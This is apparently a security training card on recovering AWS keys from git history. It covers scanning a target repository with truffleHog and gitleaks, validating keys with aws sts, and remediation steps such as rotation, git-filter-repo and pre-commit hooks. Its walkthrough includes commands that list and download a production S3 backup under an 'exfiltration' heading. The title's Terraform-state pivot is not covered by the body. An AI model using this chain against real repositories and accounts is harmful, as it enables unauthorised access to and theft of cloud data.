Terraform State-to-AWS Pivot: Credential Extraction Chain from Leaked State to Live Resources
Theory
Why This Matters
In 2019, a developer at a major e-commerce platform accidentally committed a .env file containing production AWS credentials to a public GitHub repository. The file was removed in the next commit three minutes later. Despite the rapid deletion, automated credential scrapers — running continuously against GitHub's public event stream — detected and exfiltrated the credentials within 47 seconds of the initial push. The credentials were used to access an S3 bucket containing 2.4 million customer email addresses before the developer had finished writing the incident report. This scenario — credential committed, "deleted," then exploited via git history — repeats dozens of times every week across public repositories. The 2022 Trufflesec research report found valid AWS credentials in over 4,000 unique public GitHub repositories, with an average time-to-exploitation of under 2 minutes for high-privilege keys.
Core Concept
Git's fundamental design principle is that history is append-only. When a file is deleted in a commit, the deletion is recorded as a new commit that removes the file from the working tree, but all previous commits — including those that added the file — remain permanently accessible in the repository's object store. A git history containing a credential commit followed by a deletion commit still exposes the credential via git show <commit-hash>, git log -p, or git diff against the parent of the deletion commit.
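The persistence described above is easy to reproduce locally. The sketch below assumes bash and a local `git` installation. The function name `demo_deleted_secret` is hypothetical. The key is AWS's published documentation example (`AKIAIOSFODNN7EXAMPLE`), not a live credential.

```bash
#!/usr/bin/env bash
# Hypothetical demo: a file removed in a later commit is still readable from history.
# AKIAIOSFODNN7EXAMPLE is AWS's documentation example key, not a real credential.
demo_deleted_secret() {
  local repo
  local -a git_id=(-c user.name=demo -c user.email=demo@example.com -c commit.gpgsign=false)
  repo="$(mktemp -d)"
  (
    cd "$repo" || exit 1
    git init -q .
    printf 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n' > .env
    git add .env
    git "${git_id[@]}" commit -q -m "add config"
    git rm -q .env
    git "${git_id[@]}" commit -q -m "remove leaked .env"
    # The working tree no longer contains .env ...
    [ ! -e .env ] && echo "working tree: .env absent"
    # ... but the parent of the deletion commit still does
    git show HEAD~1:.env
  )
  rm -rf "$repo"
}
```

Calling `demo_deleted_secret` should print the "absent" line followed by the `.env` content recovered from the parent of the deletion commit.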
Hardcoded credentials enter git repositories through several paths: .env files committed without a corresponding .gitignore entry; credentials in configuration files (config.yml, settings.py, application.properties); inline test credentials used during development; and CI/CD configuration files that contain credentials in plaintext rather than referencing secrets management.
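For the first of these paths, a `.gitignore` entry is the cheapest guard. The sketch below assumes bash and git. The helper names and the patterns are illustrative assumptions, including `*.tfvars` and the `!.env.example` exception. Ignore rules have no effect on files that are already tracked, and they cannot protect shared files such as `settings.py`.

```bash
#!/usr/bin/env bash
# Hypothetical helper: append credential-file ignore rules to a repository's .gitignore.
# The pattern choices are illustrative; adapt them to the project's layout.
add_secret_ignores() {
  local repo="${1:-.}"
  cat >> "$repo/.gitignore" <<'EOF'
# Local credential files
.env
.env.*
!.env.example
*.tfvars
EOF
}

# Report whether git would ignore a path (exit status 0 = ignored).
# Usage: is_ignored REPO PATH
is_ignored() {
  git -C "$1" check-ignore -q "$2"
}
```

The `!.env.example` negation keeps a committed template visible while still ignoring environment-specific variants such as `.env.production`.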
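Automated scanning tools target this pattern specifically. truffleHog originally (v2) combined regex matching with Shannon entropy analysis. This flagged high-entropy strings, such as random-looking AWS secret keys, even when they matched no known credential pattern. Current v3 releases instead use credential-specific detectors, and many of these can verify a candidate against the issuing service. gitleaks uses a TOML-based ruleset of regular expressions, where each rule can also set a minimum entropy, and is typically faster on large repositories. Both tools scan the entire git history, not just the current HEAD.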
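The entropy idea can be illustrated with Shannon entropy, H = -sum(p_i * log2(p_i)), where p_i is the frequency of each distinct character in a string. Random keys score high and ordinary words score low. The sketch below uses bash and awk. The function name is hypothetical, and it does not reproduce either tool's thresholds or tokenisation.

```bash
#!/usr/bin/env bash
# Hypothetical helper: Shannon entropy of a string in bits per character,
# H = -sum(p_i * log2(p_i)) over the frequency p_i of each distinct character.
# Usage: shannon_entropy STRING
shannon_entropy() {
  printf '%s\n' "$1" | awk '
    {
      n = length($0)
      for (i = 1; i <= n; i++) count[substr($0, i, 1)]++
      total += n
    }
    END {
      h = 0
      for (c in count) {
        p = count[c] / total
        h -= p * log(p) / log(2)   # awk log() is the natural log; divide to get log2
      }
      printf "%.3f\n", h
    }'
}
```

`shannon_entropy password` prints `2.750`. AWS's documentation example secret key, `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`, prints `4.663`. That gap is what an entropy threshold exploits.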
aws sts get-caller-identity is the standard validation step — it confirms that a credential is valid and returns the IAM identity without requiring any other permissions. A successful response means the credential is active and usable. After validation, the scope of access depends on the attached policies.
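Before calling STS, candidate key IDs can be triaged by prefix. IDs beginning with `AKIA` are long-term IAM user (or root) keys. IDs beginning with `ASIA` belong to temporary STS credentials and only work together with a session token. The sketch below assumes bash. Both function names are hypothetical, and `validate_key` assumes the AWS CLI is installed.

```bash
#!/usr/bin/env bash
# Hypothetical helpers for triaging and validating candidate AWS access keys.

# Classify a candidate access key ID by its documented prefix.
classify_key_id() {
  local long_term='^AKIA[A-Z0-9]{16}$' temporary='^ASIA[A-Z0-9]{16}$'
  if [[ "$1" =~ $long_term ]]; then
    echo "long-term"
  elif [[ "$1" =~ $temporary ]]; then
    echo "temporary"
  else
    echo "unknown"
  fi
}

# Validate a key pair with sts get-caller-identity (no IAM permissions needed).
# Prints the caller ARN on success; the AWS CLI exits non-zero for invalid or inactive keys.
# Usage: validate_key ACCESS_KEY_ID SECRET_ACCESS_KEY [SESSION_TOKEN]
validate_key() {
  local -a vars=("AWS_ACCESS_KEY_ID=$1" "AWS_SECRET_ACCESS_KEY=$2")
  [ -n "${3:-}" ] && vars+=("AWS_SESSION_TOKEN=$3")
  # Clear any ambient profile or token so only the supplied credentials are used
  env -u AWS_PROFILE -u AWS_SESSION_TOKEN "${vars[@]}" \
    aws sts get-caller-identity --query Arn --output text
}
```

Classification costs no API call, so it can be used to filter scanner output before any validation attempt.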
git-filter-repo is the recommended tool for rewriting history after credential exposure. It is faster and safer than git filter-branch, whose own documentation now recommends git filter-repo instead. However, history rewrite is only effective for private repositories where every clone can be updated. For public repositories, the credential must be rotated immediately, because scrapers may already have cached it.
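The rotate-first ordering can be captured in a small wrapper. The sketch below assumes bash and the AWS CLI, and it assumes the leaked key belongs to an IAM user. `rotate_leaked_key` and its `DRY_RUN` switch are hypothetical. IAM allows at most two access keys per user, so creating the replacement fails if two already exist.

```bash
#!/usr/bin/env bash
# Hypothetical wrapper encoding the rotate-before-rewrite order for a leaked IAM user key.
# DRY_RUN=1 (the default) only prints the commands; set DRY_RUN=0 to execute them.

run() {
  if [ "${DRY_RUN:-1}" = "1" ]; then
    echo "+ $*"
  else
    "$@"
  fi
}

# Usage: rotate_leaked_key IAM_USER LEAKED_ACCESS_KEY_ID
rotate_leaked_key() {
  local user="$1" leaked="$2"
  # 1. Issue a replacement key; deploying it to legitimate consumers is not shown.
  run aws iam create-access-key --user-name "$user" || return 1
  # 2. Deactivate the leaked key immediately.
  run aws iam update-access-key --user-name "$user" --access-key-id "$leaked" --status Inactive || return 1
  # 3. Delete it: an Inactive key can be re-enabled by anyone holding iam:UpdateAccessKey.
  run aws iam delete-access-key --user-name "$user" --access-key-id "$leaked" || return 1
  # Only after this point is it worth rewriting git history with git filter-repo.
}
```

Running it with the default dry run first prints the three commands in order. This makes the sequence easy to review before executing it with `DRY_RUN=0`.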
Technical Deep-Dive
```bash
# ── Manual git history search ─────────────────────────────────
# Clone the target repository (a full clone, not --depth, so all history is present)
git clone https://github.com/targetorg/infrastructure-configs.git
cd infrastructure-configs
# Search all commits on all refs for AWS credential patterns
git log --all -p | grep -E "(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AKIA[A-Z0-9]{16})"
# List commits that touched .env files anywhere in the tree
git log --all --full-history -- "**/.env" "*.env" ".env"
# Show the content of .env as it existed at a specific commit
git show <COMMIT_HASH>:.env
# For the commit that deleted the file, read it from that commit's parent
git show <DELETION_COMMIT_HASH>^:.env
# or view the deletion diff itself (removed lines are printed with a leading "-")
git show <DELETION_COMMIT_HASH>
# List every .env path touched by any commit reachable from a ref or a reflog entry
# (--reflog also covers older stash entries, which --all alone misses; -m includes merge and stash commits)
git rev-list --all --reflog | xargs -I{} git diff-tree --root -m --no-commit-id --name-only -r {} | grep -E '(^|/)\.env$' | sort -u
# ── Automated scanning ────────────────────────────────────────
# truffleHog (v3): detector-based scanning of the full git history, JSON-lines output
trufflehog git file://. --json | jq .
# For a remote repo
trufflehog github --repo https://github.com/targetorg/infrastructure-configs
# gitleaks: TOML rule-based scanning; --log-opts is passed through to git log
gitleaks detect --source . --log-opts "--all" --report-format json --report-path findings.json
jq '.[] | {File, Secret, StartLine, Commit}' findings.json
# ── Credential validation ──────────────────────────────────────
export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="extracted-secret"
# ASIA... keys are temporary and also need AWS_SESSION_TOKEN to be exported
# GetCallerIdentity needs no IAM permissions, so it succeeds for any valid key
aws sts get-caller-identity
# If valid: returns Account, UserId, Arn
# Check key metadata (age, status); requires iam:ListAccessKeys and,
# without --user-name, reports on the user that owns the signing key
aws iam list-access-keys
# ── S3 access and exfiltration ────────────────────────────────
aws s3 ls
aws s3 ls s3://company-production-backups --recursive
aws s3 cp s3://company-production-backups/backup-2024-01.sql.gz ./
# ── Remediation: git history rewrite after exposure ───────────
# IMPORTANT: rotate the credential first; rewriting history does not revoke it,
# and scrapers may already have it
# Install git-filter-repo (pip3 install git-filter-repo) and run it in a fresh clone
git filter-repo --path .env --invert-paths
# filter-repo removes the "origin" remote to prevent accidental pushes; re-add it
git remote add origin https://github.com/targetorg/infrastructure-configs.git
git push origin --force --all    # requires force push; coordinate with team
git push origin --force --tags
```
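The `grep` search above reports matching lines but not the commits they came from. The following bash sketch pairs each added AWS access key ID with the commit that introduced it. The function name is hypothetical, and it reports only the first key ID on each line.

```bash
#!/usr/bin/env bash
# Hypothetical helper: print "<commit> <key-id>" for each AWS access key ID that appears
# on an added ("+") line in any commit reachable from any ref.
# Usage: find_key_ids_with_commits [REPO]
find_key_ids_with_commits() {
  local commit_re='^commit ([0-9a-f]+)$' key_re='(AKIA[A-Z0-9]{16})'
  local commit="" line
  git -C "${1:-.}" log --all -p --format='commit %H' |
    while IFS= read -r line; do
      if [[ "$line" =~ $commit_re ]]; then
        commit="${BASH_REMATCH[1]}"          # header line emitted by --format
      elif [[ "$line" == +* && "$line" =~ $key_re ]]; then
        printf '%s %s\n' "$commit" "${BASH_REMATCH[1]}"
      fi
    done | sort -u
}
```

Only added lines are matched. A key that was later deleted is therefore attributed to the commit that introduced it, not to the deletion commit.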
Security Assessment Methodology
- Clone the target repository: obtain the full git history. For GitHub targets, also check archived forks and Gists from the same organisation.
- Run truffleHog: `trufflehog git file://. --json` scans the repository's commit history for known credential patterns. Review the JSON output for `AWS`, `SECRET`, `KEY`, and `TOKEN` findings.
- Run gitleaks as a second pass: `gitleaks detect --source . --log-opts "--all"` scans the same history with a signature-based ruleset. The two tools use different detection approaches and have complementary coverage.
- Perform manual targeted searches: use `git log --all -p | grep -E "AKIA[A-Z0-9]{16}"` to find AWS access key IDs specifically. Also search history for `.env`, `credentials`, `secrets.yml`, and `terraform.tfvars` file paths.
- Validate discovered credentials: export each credential and run `aws sts get-caller-identity`. Only active credentials represent a current exposure. Keys that fail validation are historical findings that still require rotation confirmation.
- Enumerate access scope: for each valid credential, determine the attached IAM policies and enumerate accessible S3 buckets, secrets, and databases.
- Document time-to-exposure: use `git log --format="%H %ai %s" --all` to find when credentials were committed and when they were removed. Report this window. Deletion does not remove the credential from history, so the real exposure lasts until the key is rotated.
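The commit-to-deletion interval can be computed directly from committer timestamps. The sketch below assumes bash and git. The function name is hypothetical. It only considers the first add and the first delete of the path and does not follow renames. The result is a lower bound on exposure, because the credential remains readable in history after deletion.

```bash
#!/usr/bin/env bash
# Hypothetical helper: seconds between the first commit that added PATH and the first
# commit that deleted it, using committer timestamps (%ct).
# Usage: exposure_window_seconds REPO PATH
exposure_window_seconds() {
  local repo="$1" path="$2" added removed
  added="$(git -C "$repo" log --all --reverse --diff-filter=A --format=%ct -- "$path" | head -n 1)"
  removed="$(git -C "$repo" log --all --reverse --diff-filter=D --format=%ct -- "$path" | head -n 1)"
  if [ -z "$added" ] || [ -z "$removed" ]; then
    echo "no add/delete pair found for $path" >&2
    return 1
  fi
  echo $(( removed - added ))
}
```

Committer time is used rather than author time because it reflects when the commit was actually recorded, which is closer to when it could have been pushed.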
Defensive Countermeasure: Add gitleaks pre-commit hooks to all developer workstations. Back them up on the server side with a GitHub Actions workflow using `gitleaks/gitleaks-action`, because local hooks can be skipped with `git commit --no-verify`. Configure the rules to block any commit containing strings matching `AKIA[A-Z0-9]{16}` or high-entropy 40-character strings. Additionally, enable GitHub Secret Scanning (built in for public repositories; private repositories require GitHub Advanced Security). Through its partner alert mechanism, GitHub reports AWS keys found in public repositories to AWS. AWS responds by notifying the account owner and attaching an AWS-managed quarantine policy (AWSCompromisedKeyQuarantine with a version suffix, such as V2) that denies a set of high-risk actions. The key itself is not deleted, so it must still be rotated.
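Where gitleaks cannot be installed, the key-ID rule can be approximated with a plain shell hook. The sketch below assumes bash, git, and the default `.git/hooks` location. It does not handle `core.hooksPath` or linked worktrees. `install_aws_key_hook` is hypothetical and covers only the `AKIA`/`ASIA` key ID pattern, not the entropy rule, so it is a fallback rather than a replacement for gitleaks.

```bash
#!/usr/bin/env bash
# Hypothetical installer for a fallback pre-commit hook that rejects staged AWS key IDs.
# Assumes the default hooks directory (.git/hooks); core.hooksPath and worktrees are not handled.
# Usage: install_aws_key_hook [REPO]
install_aws_key_hook() {
  local hook="${1:-.}/.git/hooks/pre-commit"
  mkdir -p "$(dirname "$hook")"
  cat > "$hook" <<'EOF'
#!/bin/sh
# Reject the commit if any added line in the staged diff contains an AWS access key ID.
hits=$(git diff --cached -U0 --no-color | grep -E '^\+' | grep -oE '(AKIA|ASIA)[A-Z0-9]{16}' | sort -u)
if [ -n "$hits" ]; then
  printf 'pre-commit: blocked, staged changes contain AWS access key IDs:\n%s\n' "$hits" >&2
  exit 1
fi
exit 0
EOF
  chmod +x "$hook"
}
```

Because it inspects only added lines in the staged diff, the hook does not fire on commits that remove a previously committed key.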
Common Assessment Errors
- Only scanning HEAD or the main branch: a deleted credential is, by definition, no longer at HEAD. Always include `--all` in git log commands to cover all branches, tags, and remote-tracking refs. `--all` does not cover the reflog. When examining an existing working copy rather than a fresh clone, add `--reflog` to reach commits (including older stashes) that are recorded only there.
- Relying on a single tool: truffleHog and gitleaks have different false-positive and false-negative rates. Run both and cross-reference findings.
- Not checking forks: if the repository was public at any point, forks may exist that captured the credential-containing commits before the repository was made private. List forks with `gh api /repos/org/repo/forks`.
- Treating inactive credentials as resolved: an IAM access key in `Status: Inactive` was disabled, not deleted. It can be re-activated by any principal with `iam:UpdateAccessKey`. The correct remediation is deletion plus credential rotation.
- Forgetting CI/CD artefact stores: Jenkins build logs, GitHub Actions run logs, and CircleCI artefacts may have captured credentials that appeared in environment variables during pipeline execution. These are separate evidence sources.
- Skipping rotation before history rewrite: history rewrite removes the credential from the repository but does not invalidate it. The credential must be rotated first; any delay between rewrite and rotation is an additional exposure window.
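The `--all` versus `--reflog` distinction matters mainly for a developer's existing working copy, since a fresh clone does not receive the origin's reflog. The sketch below assumes bash, git, and default reflog settings. Both function names are hypothetical. The discarded commit stays reachable through the reflog only until its reflog entries expire and garbage collection prunes it.

```bash
#!/usr/bin/env bash
# Hypothetical demo: a commit discarded with `git reset --hard` is no longer reachable
# from any ref, so `git log --all` misses it, but the reflog still records it.

# Count distinct commits that `git log` reaches with the given extra options.
# Usage: count_commits REPO [GIT_LOG_OPTIONS...]
count_commits() {
  local repo="$1"
  shift
  git -C "$repo" log --format=%H "$@" | sort -u | wc -l | tr -d ' '
}

# Build a throwaway repo whose credential commit survives only in the reflog; prints its path.
make_reflog_only_repo() {
  local repo
  local -a git_id=(-c user.name=demo -c user.email=demo@example.com -c commit.gpgsign=false)
  repo="$(mktemp -d)"
  git -C "$repo" init -q
  echo "base" > "$repo/README"
  git -C "$repo" add README
  git -C "$repo" "${git_id[@]}" commit -q -m "base"
  # AWS documentation example key, not a real credential
  echo "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE" > "$repo/.env"
  git -C "$repo" add .env
  git -C "$repo" "${git_id[@]}" commit -q -m "leak"
  git -C "$repo" reset -q --hard HEAD~1
  echo "$repo"
}
```

In the generated repository, `count_commits "$repo" --all` sees only the base commit. Adding `--reflog` also reaches the discarded credential commit.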
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0053 | Knowledge of cloud infrastructure vulnerabilities and attack surfaces | Explains how git's append-only history model creates permanent credential exposure and how automated scrapers exploit this |
| K0167 | Knowledge of systems security testing methodologies | Develops a seven-step git credential hunting methodology from repository cloning through scope enumeration and time-to-exposure documentation |
| S0073 | Skill in using penetration testing tools and techniques against cloud infrastructure | Trains use of truffleHog entropy scanning, gitleaks signature detection, manual grep-based git history search, and AWS CLI credential validation |
| T0144 | Task: Conduct penetration testing on cloud-hosted systems | Directly exercises the complete git-to-S3 attack chain including automated scanning, manual verification, and access scope analysis |
| T0395 | Task: Recommend security controls for cloud environments | Develops pre-commit hook configuration, GitHub Secret Scanning setup, and the correct rotation-before-rewrite remediation sequence |